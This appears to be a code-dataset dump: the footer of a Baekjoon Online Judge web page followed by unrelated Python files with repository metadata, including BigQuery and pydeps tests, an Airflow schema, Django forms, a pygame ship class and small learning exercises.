<span style="font-size:18px;">강의 슬라이드의 첨부 소스 코드가 404 에러가 뜨는 경우에는 링크를 복사/붙여넣기 해주세요.</span>
</div>
<div class="margin-bottom-40"></div>
</div>
</div>
<div class="footer-v3 no-print"><div class="footer"><div class="container"><div class="row"><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>Baekjoon Online Judge</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/about">소개</a></li><li><a href="/news">뉴스</a></li><li><a href="/live">생중계</a></li><li><a href="/poll">설문조사</a></li><li><a href="/blog">블로그</a></li><li><a href="/calendar">캘린더</a></li><li><a href="/donate">기부하기</a></li><li><a href="https://github.com/Startlink/BOJ-Feature-Request">기능 추가 요청</a></li><li><a href="https://github.com/Startlink/BOJ-spj">스페셜 저지 제작</a></li><li><a href="/labs">실험실</a></li></ul><div class="thumb-headline"><h2>채점 현황</h2></div><ul class="list-unstyled simple-list"><li><a href="/status">채점 현황</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>문제</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/problemset">문제</a></li><li><a href="/step">단계별로 풀어보기</a></li><li><a href="/problem/tags">알고리즘 분류</a></li><li><a href="/problem/added">새로 추가된 문제</a></li><li><a href="/problem/added/1">새로 추가된 영어 문제</a></li><li><a href="/problem/ranking">문제 순위</a></li><li><a href="/problem/recent/submit">최근 제출된 문제</a></li><li><a href="/problem/recent/accepted">최근 풀린 문제</a></li><li><a href="/change">재채점 및 문제 수정</a></li></ul><div class="thumb-headline"><h2>유저 대회 / 고등학교 대회</h2></div><ul class="list-inline simple-list margin-bottom"><li><a href="/category/353">FunctionCup</a></li><li><a href="/category/319">kriiicon</a></li><li><a href="/category/420">구데기컵</a></li><li><a href="/category/358">꼬마컵</a></li><li><a href="/category/421">네블컵</a></li><li><a href="/category/413">소프트콘</a></li><li><a href="/category/416">웰노운컵</a></li><li><a href="/category/detail/1743">HYEA Cup</a></li><li><a href="/category/364">경기과학고등학교</a></li><li><a href="/category/417">대구과학고등학교</a></li><li><a href="/category/429">부산일과학고</a></li><li><a href="/category/435">서울과학고등학교</a></li><li><a href="/category/394">선린인터넷고등학교</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>출처</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/category/1">ICPC</a></li><li><a href="/category/211">ICPC Korea Regional</a></li><li><a href="/category/2">Olympiad</a></li><li><a href="/category/55">한국정보올림피아드</a></li><li><a href="/category/57">한국정보올림피아드시․도지역본선</a></li><li><a href="/category/318">전국 대학생 프로그래밍 대회 동아리 연합</a></li><li><a href="/category/5">대학교 대회</a></li><li><a href="/category/428">카카오 코드 페스티벌</a></li><li><a href="/category/215">Coder's High</a></li></ul><div class="thumb-headline"><h2>대학교 대회</h2></div><ul class="list-inline simple-list"><li><a href="/category/320">KAIST</a></li><li><a href="/category/426">POSTECH</a></li><li><a href="/category/341">고려대학교</a></li><li><a href="/category/434">광주과학기술원</a></li><li><a href="/category/361">국민대학교</a></li><li><a href="/category/83">서강대학교</a></li><li><a href="/category/354">서울대학교</a></li><li><a href="/category/352">숭실대학교</a></li><li><a href="/category/408">아주대학교</a></li><li><a href="/category/334">연세대학교</a></li><li><a href="/category/336">인하대학교</a></li><li><a href="/category/347">전북대학교</a></li><li><a href="/category/400">중앙대학교</a></li><li><a href="/category/402">충남대학교</a></li><li><a href="/category/418">한양대 ERICA</a></li><li><a href="/category/363">홍익대학교</a></li><li><a href="/category/409">경인지역 6개대학 연합 프로그래밍 경시대회</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>도움말</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/help/judge">채점 도움말 및 채점 환경</a></li><li><a href="/help/rejudge">재채점 안내</a></li><li><a href="/help/rte">런타임 에러 도움말</a></li><li><a href="/help/problem">문제 스타일 안내</a></li><li><a href="/help/language">컴파일 또는 실행 옵션, 컴파일러 버전, 언어 도움말</a></li><li><a href="/help/workbook">문제집 도움말</a></li><li><a href="/help/contest">대회 개최 안내</a></li><li><a href="/help/problem-add">문제 출제 안내</a></li><li><a href="/help/rule">이용 규칙</a></li><li><a href="/help/stat">통계 도움말</a></li><li><a href="/help/question">질문 도움말</a></li><li><a href="/help/faq">자주묻는 질문</a></li><li><a href="/help/lecture">강의 안내</a></li><li><a href="/help/short">짧은 주소 안내</a></li><li><a href="/help/ad">광고 안내</a></li></ul></div></div></div><div class="copyright"><div class="container"><div class="row"><div class="col-md-9 col-sm-12"><p>© 2021 All Rights Reserved. <a href="https://startlink.io">주식회사 스타트링크</a> | <a href="/terms">서비스 약관</a> | <a href="/privacy">개인정보 보호</a> | <a href="/terms/payment">결제 이용 약관</a> | <a href="https://boj.startlink.help/hc/ko">도움말</a> | <a href="http://startl.ink/2pmlJaY">광고 문의</a> | <a href="https://github.com/Startlink/update-note/blob/master/boj.md">업데이트 노트</a> | <a href="https://github.com/Startlink/update-note/blob/master/boj-issues.md">이슈</a> | <a href="https://github.com/Startlink/update-note/blob/master/boj-todo.md">TODO</a></p></div><div class="col-md-3 col-sm-12"><ul class="social-icons pull-right"><li><a href="https://www.facebook.com/onlinejudge" data-original-title="Facebook" class="rounded-x social_facebook"></a></li><li><a href="https://startlink.blog" data-original-title="Wordpress" class="rounded-x social_wordpress"></a></li></ul></div></div><div class="row"><div class="col-sm-12"><a href="https://startlink.io" class="hidden-xs"><img src="https://d2gd6pc034wcta.cloudfront.net/logo/startlink-logo-white-only.png" class="pull-right startlink-logo"></a><ul class="list-unstyled simple-list"><li>사업자 등록 번호: 541-88-00682</li><li>대표자명: 최백준</li><li>주소: 서울시 서초구 서초대로74길 29 서초파라곤 412호</li><li>전화번호: 02-521-0487 (이메일로 연락 주세요)</li><li>이메일: <a href="mailto:[email protected]">[email protected]</a></li><li>통신판매신고번호: 제 2017-서울서초-2193 호</li></ul></div><div class="col-xs-9"><p id="no-acm-icpc"></p></div><div class="col-xs-3"></div></div></div></div></div>
</div>
<div id="fb-root"></div><script>
window.fbAsyncInit = function() {
FB.init({
appId : '322026491226049',
cookie : true,
xfbml : true,
version : 'v2.8'
});
};
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/ko_KR/sdk.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<script>
!function(f,b,e,v,n,t,s){ if(f.fbq)return;n=f.fbq=function(){ n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments) };if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s) }(window,
document,'script','//connect.facebook.net/en_US/fbevents.js');
fbq('init', '1670563073163149');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1670563073163149&ev=PageView&noscript=1"/></noscript><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/3.0.1/jquery-migrate.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/js/bootstrap.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.21.0/moment.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.21.0/locale/ko.js"></script><script type="text/javascript" src="https://ddo7jzca0m2vt.cloudfront.net/unify/js/app.min.js?version=20210107"></script><script type="text/javascript">jQuery(document).ready(function() {App.init(0);});</script><!--[if lt IE 9]><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/plugins/respond.js"></script><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/plugins/html5shiv.js"></script><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/js/plugins/placeholder-IE-fixes.js"></script><![endif]--><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.0.2/pace.min.js"></script><script src="https://js.pusher.com/4.2/pusher.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.js"></script>
<script>
window.MathJax = {
tex: {
inlineMath: [ ['$', '$'], ['\\(', '\\)'] ],
displayMath: [ ['$$','$$'], ["\\[","\\]"] ],
processEscapes: true,
tags: "ams",
autoload: {
color: [],
colorv2: ['color']
},
packages: { '[+]': ['noerrors'] }
},
options: {
ignoreHtmlClass: "no-mathjax|redactor-editor",
processHtmlClass: 'mathjax',
enableMenu: false
},
chtml: {
scale: 0.9
},
loader: {
load: ['input/tex', 'output/chtml', '[tex]/noerrors'],
}
};
</script><script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script><script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
</body>
</html> | [
"[email protected]"
] | |
4d4d91dbf71adc295e441bc7d03a0ec941967878 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_8965.py | 60985953452cc8e3a19e764e0aa2103646d7d4f7 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | # Use python to run shell script with Popen behaves differently in python command line and actual program
from subprocess import Popen, PIPE
| [
"[email protected]"
] | |
a5e60e51f46f0f4c1de4519f9e3ed6e437e72ee2 | 0862943574c7cbf98f7d049a516e8caf204304d1 | /todo_list.py | 3802e8c3b0c13da8abc8fac0eeef687f9a4748c8 | [] | no_license | MsMunda/Fun | 4a29a4d70e8f46e8d94c385831a7a49135566104 | 6d22207b75a59cb53d1d2e85549472571feeb1c5 | refs/heads/master | 2021-01-20T03:23:27.051210 | 2017-04-27T01:08:24 | 2017-04-27T01:08:24 | 89,535,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | """This is a Terminal-based program that allows a user to create and edit a to-do list.
The stub of each function has been provided. Read the docstrings for what each
function should do and complete the body of the functions below.
You can run the script in your Terminal at any time using the command:
>>> python todo_list.py
"""
def add_to_list(my_list):
"""Takes user input and adds it as a new item to the end of the list."""
print "The add_to_list function has not yet been written"
def view_list(my_list):
"""Print each item in the list."""
print "The view_list function has not yet been written"
def display_main_menu(my_list):
"""Displays main options, takes in user input, and calls view or add function."""
user_options = """
\nWould you like to:
A. Add a new item
B. View list
C. Quit the program
>>> """
while True:
user_input = raw_input(user_options)
if user_input == 'A':
add_to_list(my_list)
#-------------------------------------------------
my_list = []
display_main_menu(my_list)
| [
"[email protected]"
] | |
848cf25049faf52b0f930681494b0600a719b9da | 4a3bf95187335a8d46139b1d7a67586e96eb387f | /venv/Scripts/easy_install-script.py | 7527f9f055f57237c2921b4ee8431cf9d8aefd47 | [] | no_license | ares5221/python-Learning | 6f786b9edf081010cd6f2ad684f505d30da8d4a8 | 4ae77239e2b91bb84b306930af88b5035b897963 | refs/heads/master | 2021-06-04T03:00:17.338022 | 2020-04-13T08:14:06 | 2020-04-13T08:14:06 | 134,068,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | #!G:\pythonLearningWorkSpace\python-Learning\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | |
a9c3e5697018a920d3e2f4f5430092dd2011706e | ec00584ab288267a7cf46c5cd4f76bbec1c70a6b | /offline/__Digital_Twin/__release2/__release2_sprint4/15619 - Link the asset locations to local weather/dev/dev.py | 585898cda425bdfd488487cf9f2d129e386b1a2e | [] | no_license | rahuldbhadange/Python | b4cc806ff23953389c9507f43d817b3815260e19 | 7e162117f1acc12537c7eeb36d6983d804122ff3 | refs/heads/master | 2021-06-23T05:04:20.053777 | 2020-01-28T10:34:28 | 2020-01-28T10:34:28 | 217,307,612 | 0 | 0 | null | 2021-06-10T22:44:11 | 2019-10-24T13:35:42 | Python | UTF-8 | Python | false | false | 2,116 | py |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
from __future__ import unicode_literals, print_function
from json import dumps
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s [%(name)s] {%(threadName)s} %(message)s', level=logging.WARNING)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
from IoticAgent.Core.compat import monotonic
from IoticAgent.ThingRunner import RetryingThingRunner
def pretty_print(msg, data):
print(msg, dumps(data, indent=4))
class TemplateTR(RetryingThingRunner):
LOOP_TIMER = 10 # minimum number of seconds duration of the main loop
def __init__(self, config=None):
"""Instantiation code in here, after the call to super().__init__()
"""
super(TemplateTR, self).__init__(config=config)
def on_startup(self):
"""Called once at the beginning, before main().
Use this method to create your things, rebind connections, setup hardware, etc.
"""
results = self.client.search(text="weather", location={'lat': 52.427809, 'long': -0.327829, 'radius': 10.789}, limit=1)
pretty_print("results", results)
for thing_guid, thing_data in results.items():
pretty_print("thing_guid", thing_guid)
pretty_print("thing_data", thing_data)
for point_guid, point_data in thing_data['points'].items():
pretty_print("point_guid", point_guid)
pretty_print("point_data", point_data)
descr = self.client.describe(point_guid)
pretty_print("descr", descr)
def main(self):
"""Called after on_startup.
Use this method for your main loop (if you need one).
Set LOOP_TIMER for your regular tick
"""
while True:
start = monotonic()
# loop code in here
stop = monotonic()
if self.wait_for_shutdown(max(0, self.LOOP_TIMER - (stop - start))):
break
def main():
TemplateTR(config="test.ini").run()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
9b42299d9d109563fa71c7a5fed85b1ebd999120 | 36907c0840b34687026b3439a06c49e5c0d2ef11 | /tests/test_file.py | 752908478767a7efc177298baf3fad6d612dd537 | [
"BSD-2-Clause"
] | permissive | melscoop/pydeps | f5585adde69dfc2afd82254260a5dd4750cf57f2 | c6078821222b314e2befbc6723a36967a9b5a47b | refs/heads/master | 2023-08-29T00:19:55.845364 | 2021-10-14T06:07:02 | 2021-10-14T06:07:02 | 423,976,408 | 1 | 0 | BSD-2-Clause | 2021-11-02T19:51:10 | 2021-11-02T19:39:42 | null | UTF-8 | Python | false | false | 713 | py | # -*- coding: utf-8 -*-
import os
from tests.filemaker import create_files
from tests.simpledeps import simpledeps
def test_file():
files = """
a.py: |
import collections
"""
with create_files(files) as workdir:
assert simpledeps('a.py') == set()
def test_file_pylib():
files = """
a.py: |
import collections
"""
with create_files(files) as workdir:
assert 'collections -> a' in simpledeps('a.py', '--pylib')
def test_file_pyliball():
files = """
a.py: |
import collections
"""
with create_files(files) as workdir:
assert 'collections -> a' in simpledeps('a.py', '--pylib --pylib-all')
| [
"[email protected]"
] | |
105b3a2100dc54523233be6553a7d540acbaf799 | b8fb2620257b6286871211b7bde1cd8a0a5468db | /ts_feature_extractor.py | c86913b859b6d8d349b58a479f536fd14205f9ff | [] | no_license | mehdidc/elnino | f9aac0c586317d261151265cbd0290ae351731b8 | 7b85ad180634f1db4a61654d1475f54c60b694a4 | refs/heads/master | 2021-01-10T07:34:57.507222 | 2015-06-04T07:15:35 | 2015-06-04T07:15:35 | 36,854,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,739 | py | import numpy as np
en_lat_bottom = -5
en_lat_top = 5
en_lon_left = 360-170
en_lon_right = 360-120
def get_enso_mean(tas):
"""The array of mean temperatures in the El Nino 3.4 region at all time points."""
return tas.loc[:, en_lat_bottom:en_lat_top, en_lon_left:en_lon_right].mean(dim=('lat','lon'))
class FeatureExtractor(object):
def __init__(self):
pass
def transform(self, temperatures_xray, n_burn_in, n_lookahead, skf_is):
"""Combine two variables: the montly means corresponding to the month of the target and
the current mean temperature in the El Nino 3.4 region."""
# This is the range for which features should be provided. Strip
# the burn-in from the beginning and the prediction look-ahead from
# the end.
valid_range = range(n_burn_in, temperatures_xray['time'].shape[0] - n_lookahead)
enso = get_enso_mean(temperatures_xray['tas'])
# reshape the vector into a table years as rows, months as columns
enso_matrix = enso.values.reshape((-1,12))
count_matrix = np.ones(enso_matrix.shape)
# compute cumulative means of columns (remember that you can only use
# the past at each time point) and reshape it into a vector
enso_monthly_mean = (enso_matrix.cumsum(axis=0) / count_matrix.cumsum(axis=0)).ravel()
# roll it backwards (6 months) so it corresponds to the month of the target
enso_monthly_mean_rolled = np.roll(enso_monthly_mean, n_lookahead - 12)
# select valid range
enso_monthly_mean_valid = enso_monthly_mean_rolled[valid_range]
enso_valid = enso.values[valid_range]
X = np.array([enso_valid, enso_monthly_mean_valid]).T
return X
| [
"[email protected]"
] | |
d5d85c91e7b3eb67b2067d90181727ba54def11a | 3db7b5409f2f9c57ab3f98bda50f8b548d98063d | /tests/system/test_list_rows.py | 4c08958c37ac71ea16fd4a02c8b4507fedecac2b | [
"Apache-2.0"
] | permissive | googleapis/python-bigquery | 66db156b52e97565f6211b2fab5aac4e519fa798 | 3645e32aeebefe9d5a4bc71a6513942741f0f196 | refs/heads/main | 2023-09-01T07:41:24.893598 | 2023-08-23T19:04:13 | 2023-08-23T19:04:13 | 226,992,475 | 622 | 287 | Apache-2.0 | 2023-09-12T04:31:26 | 2019-12-10T00:09:04 | Python | UTF-8 | Python | false | false | 4,455 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import decimal
from dateutil import relativedelta
from google.cloud import bigquery
from google.cloud.bigquery import enums
def test_list_rows_empty_table(bigquery_client: bigquery.Client, table_id: str):
from google.cloud.bigquery.table import RowIterator
table = bigquery_client.create_table(table_id)
# It's a bit silly to list rows for an empty table, but this does
# happen as the result of a DDL query from an IPython magic command.
rows = bigquery_client.list_rows(table)
assert isinstance(rows, RowIterator)
assert tuple(rows) == ()
def test_list_rows_page_size(bigquery_client: bigquery.Client, table_id: str):
num_items = 7
page_size = 3
num_pages, num_last_page = divmod(num_items, page_size)
to_insert = [{"string_col": "item%d" % i, "rowindex": i} for i in range(num_items)]
bigquery_client.load_table_from_json(to_insert, table_id).result()
df = bigquery_client.list_rows(
table_id,
selected_fields=[bigquery.SchemaField("string_col", enums.SqlTypeNames.STRING)],
page_size=page_size,
)
pages = df.pages
for i in range(num_pages):
page = next(pages)
assert page.num_items == page_size
page = next(pages)
assert page.num_items == num_last_page
def test_list_rows_scalars(bigquery_client: bigquery.Client, scalars_table: str):
rows = sorted(
bigquery_client.list_rows(scalars_table), key=lambda row: row["rowindex"]
)
row = rows[0]
assert row["bool_col"] # True
assert row["bytes_col"] == b"Hello, World!"
assert row["date_col"] == datetime.date(2021, 7, 21)
assert row["datetime_col"] == datetime.datetime(2021, 7, 21, 11, 39, 45)
assert row["geography_col"] == "POINT(-122.0838511 37.3860517)"
assert row["int64_col"] == 123456789
assert row["interval_col"] == relativedelta.relativedelta(
years=7, months=11, days=9, hours=4, minutes=15, seconds=37, microseconds=123456
)
assert row["numeric_col"] == decimal.Decimal("1.23456789")
assert row["bignumeric_col"] == decimal.Decimal("10.111213141516171819")
assert row["float64_col"] == 1.25
assert row["string_col"] == "Hello, World!"
assert row["time_col"] == datetime.time(11, 41, 43, 76160)
assert row["timestamp_col"] == datetime.datetime(
2021, 7, 21, 17, 43, 43, 945289, tzinfo=datetime.timezone.utc
)
nullrow = rows[1]
for column, value in nullrow.items():
if column == "rowindex":
assert value == 1
else:
assert value is None
def test_list_rows_scalars_extreme(
bigquery_client: bigquery.Client, scalars_extreme_table: str
):
rows = sorted(
bigquery_client.list_rows(scalars_extreme_table),
key=lambda row: row["rowindex"],
)
row = rows[0]
assert row["bool_col"] # True
assert row["bytes_col"] == b"\r\n"
assert row["date_col"] == datetime.date(9999, 12, 31)
assert row["datetime_col"] == datetime.datetime(9999, 12, 31, 23, 59, 59, 999999)
assert row["geography_col"] == "POINT(-135 90)"
assert row["int64_col"] == 9223372036854775807
assert row["interval_col"] == relativedelta.relativedelta(
years=-10000, days=-3660000, hours=-87840000
)
assert row["numeric_col"] == decimal.Decimal(f"9.{'9' * 37}E+28")
assert row["bignumeric_col"] == decimal.Decimal(f"9.{'9' * 75}E+37")
assert row["float64_col"] == float("Inf")
assert row["string_col"] == "Hello, World"
assert row["time_col"] == datetime.time(23, 59, 59, 999999)
assert row["timestamp_col"] == datetime.datetime(
9999, 12, 31, 23, 59, 59, 999999, tzinfo=datetime.timezone.utc
)
nullrow = rows[4]
for column, value in nullrow.items():
if column == "rowindex":
assert value == 4
else:
assert value is None
| [
"[email protected]"
] | |
61d4759ecc91732720a3b6343a276d796bea8fd6 | 6aa7e203f278b9d1fd01244e740d5c944cc7c3d3 | /airflow/api_connexion/schemas/event_log_schema.py | 0753a8a104a44ec8b1a0d3b8965e9cd0eee383b3 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"Python-2.0"
] | permissive | laserpedro/airflow | 83fc991d91749550b151c81876d9e7864bff3946 | a28afa8172489e41ecf7c381674a0cb91de850ff | refs/heads/master | 2023-01-02T04:55:34.030935 | 2020-10-24T15:55:11 | 2020-10-24T15:55:11 | 285,867,990 | 1 | 0 | Apache-2.0 | 2020-08-07T15:56:49 | 2020-08-07T15:56:49 | null | UTF-8 | Python | false | false | 1,861 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import List, NamedTuple
from marshmallow import Schema, fields
from marshmallow_sqlalchemy import SQLAlchemySchema, auto_field
from airflow.models.log import Log
class EventLogSchema(SQLAlchemySchema):
""" Event log schema """
class Meta:
""" Meta """
model = Log
id = auto_field(data_key='event_log_id', dump_only=True)
dttm = auto_field(data_key='when', dump_only=True)
dag_id = auto_field(dump_only=True)
task_id = auto_field(dump_only=True)
event = auto_field(dump_only=True)
execution_date = auto_field(dump_only=True)
owner = auto_field(dump_only=True)
extra = auto_field(dump_only=True)
class EventLogCollection(NamedTuple):
""" List of import errors with metadata """
event_logs: List[Log]
total_entries: int
class EventLogCollectionSchema(Schema):
""" EventLog Collection Schema """
event_logs = fields.List(fields.Nested(EventLogSchema))
total_entries = fields.Int()
event_log_schema = EventLogSchema()
event_log_collection_schema = EventLogCollectionSchema()
| [
"[email protected]"
] | |
5c25a940343aea2972f36ee9b25e6e5a5019f0f5 | 9e567b8241ce00e9d53843f5aba11c4a119b079f | /tags/v0_61_0/htdocs/tut/silly_axes.py | acdd1abf85c5ec85aa02e9070be482fceec67f1b | [
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | neilpanchal/matplotlib | 3d2a7133e858c4eefbb6c2939eb3f7a328b18118 | 7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83 | refs/heads/master | 2020-06-11T09:20:43.941323 | 2011-01-21T21:50:16 | 2011-01-21T21:50:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from matplotlib.matlab import *
t = arange(0, 2.1, 0.1)
rc('grid', color=0.75, linewidth=1.5)
rc('tick', color='b', labelsize=14)
a = subplot(111)
plot(t, t**2, '-')
title('Custom axes using rc')
grid(True)
savefig('custom_axes')
show()
| [
"(no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed"
] | (no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed |
e3c9eebf31eb84021294e0f466f8819622e71363 | 7b65481a7183f56a8b4ba2bce08cd1131cebe0e6 | /infinitelooper.py | 0365155016e44f11023400bc8ece254156932bd4 | [] | no_license | guadalupeaceves-lpsr/class-samples | 17e261084de2e64ceae6daaaac5a53618eeafb37 | bc5c096453243ef76ca6854d54232ea234ba24b5 | refs/heads/master | 2021-01-21T04:48:01.443832 | 2016-06-13T03:50:15 | 2016-06-13T03:50:15 | 48,007,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | print("What's your favorite number?")
num = int(raw_input())
while num != 14:
print("Nope, I don't like it. Choose another.")
num = int(raw_input())
| [
"lps@lps-1011PX.(none)"
] | lps@lps-1011PX.(none) |
63366e5426c932f5970b06f1ed4796f94c709e38 | 3fd9c7ee49a32eae3013191b63154a9a5d6dafe6 | /12.6驾驶飞船/12.6.3左右移动/ship_3.py | 29b66748188b9598c3cd9ceb7bfaba5932bbc169 | [] | no_license | taozhenting/alien_invasion | e0c03cd9797cb33e40ca47a13eadeda8b1c4cf85 | fd9bd97d6238da702fbb1eb6fcb78e8352875fe2 | refs/heads/master | 2020-04-27T05:31:48.862784 | 2019-01-30T09:43:49 | 2019-01-30T09:43:50 | 174,083,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,737 | py | #增加左边移动
import pygame
class Ship():
#screen参数指定了飞船绘制到什么地方
def __init__(self,screen):
"""初始化飞船并设置其初始位置"""
self.screen = screen
#加载飞船图像并获取其外接矩形
#调用pygame.image.load()这个函数返回一个表示飞船的surface并存储到了self.image
self.image = pygame.image.load('images/ship.bmp')
#rect处理对象是矩形,即便它们形状并非矩形。使用get_rect()获取相应surface的属性rect
self.rect = self.image.get_rect()
#将表示屏幕的矩形存储在self.screen_rect
self.screen_rect = screen.get_rect()
#将每艘新飞船放在屏幕中央
#将self.rect.centerx(飞船中心的x坐标)设置为表示屏幕的矩形的属性centerx
self.rect.centerx = self.screen_rect.centerx
#将self.rect.bottom(飞船下边缘的y坐标)设置为表示屏幕的矩形的属性bottom
self.rect.bottom = self.screen_rect.bottom
#移动标志,增加左移动
self.moving_right = False
self.moving_left = False
def update(self):
"""根据移动标志调整飞船的位置"""
if self.moving_right:
self.rect.centerx += 1
#添加了if而不是elif,因为如果同时按下左右箭头,先增加再减少self.rect.centerx
#如果用elif,右箭头将始终处于优先地位
if self.moving_left:
self.rect.centerx -= 1
#定义了方法blitme(),它根据self.rect指定的位置将图像绘制到屏幕上
def blitme(self):
"""在指定位置绘制飞船"""
self.screen.blit(self.image,self.rect) | [
"[email protected]"
] | |
0640154e6d006f7e8cd5a8a84feb4397adea1e62 | 3dbb38734200935f143ea8b6446e9bf32a4a16ee | /PyClient/TableOfLife/app/forms.py | 2f670b63694db308562266cdc27f51cebb639723 | [] | no_license | k-t-l-h/TableOfLife | 4624938a2edff3b5de336c30fec5775a5e3971cf | f0ceefe499b9a5a76b9f15201cbd409fa75f0605 | refs/heads/main | 2023-05-14T09:39:37.406622 | 2021-06-03T19:35:43 | 2021-06-03T19:35:43 | 345,408,827 | 0 | 2 | null | 2023-02-17T18:58:24 | 2021-03-07T17:26:42 | C++ | UTF-8 | Python | false | false | 1,125 | py | from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.contrib.auth.models import User
from django.core import validators
from django import forms
import re
class AskForm(forms.Form):
classes = forms.CharField(label='О предметах:', widget=forms.Textarea(
attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Название предмета, Имя преподавателя, Количество студентов'}))
students = forms.CharField(label='Выбор учеников:', widget=forms.Textarea(
attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Матрица оценок'}))
settings = forms.CharField(label='Настройка (только для продвинутых): crossover, mutation, selector, creator', widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Указывайте через запятую'}))
class PostForm(forms.Form):
uuid = forms.CharField(label='Ваш UUID:', widget=forms.TextInput(
attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'UUID'}))
| [
"[email protected]"
] | |
4b019b306236babfdf442ed4b7f1e6d0ebb21614 | ae8a89e90b4d69a061076563ba68272d27e5c664 | /HIDS/main.py | a75779d5ec65158a8c28c296ca08fbb8d7b57269 | [] | no_license | Louis-Saglio/python_script | 8d1a65f704c21eb3b2fee17e63b8d2b467764bb0 | f039e61078f5eb18d3334c4940d794fa5bc5f67d | refs/heads/master | 2022-12-21T21:37:07.234976 | 2017-10-29T15:52:47 | 2017-10-29T15:52:47 | 106,963,199 | 0 | 1 | null | 2022-12-09T03:22:11 | 2017-10-14T21:11:03 | Python | UTF-8 | Python | false | false | 255 | py | import filecmp
import os
def rlistdir(path='.'):
for directory, sub_dir, files in os.walk(path):
for file in files:
yield os.path.join(directory, file)
if __name__ == '__main__':
for i in rlistdir('/usr'):
print(i)
| [
"[email protected]"
] | |
